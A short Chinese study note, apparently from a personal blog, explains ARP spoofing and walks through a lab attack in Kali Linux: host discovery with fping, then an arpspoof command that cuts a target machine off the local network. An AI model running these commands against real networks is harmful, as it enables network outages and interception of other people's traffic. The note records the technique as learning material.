局域网断网攻击 (ARP攻击)

攻击原理：ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗，能够在网络中产生大量的ARP通信量使网络阻塞，攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目，造成网络中断或中间人攻击。

 

获取局域网中的IP地址（以本机地址为实验）：命令行执行ipconfig

    

获取的IP为192.168.1.xxx

网关为：192.168.1.1

打开kali linux终端，执行;ifconfig

得到本机网卡为：eth0

在终端中执行：arpspoof -i eth0 -t 192.168.1.xxx 192.168.1.1

执行成功；目标局域网失去连接。

Ctrl + C 终止命令。

 

如何获取局域网IP: 

   kali linux 终端执行：fping -asg 192.168.1.0/24（IP搜索根据本地IP进行）

其中第一个是网关，剩下的为IP。

 

局限性：只能攻击主机局域网中的目标机

本文仅充当本人学习笔记。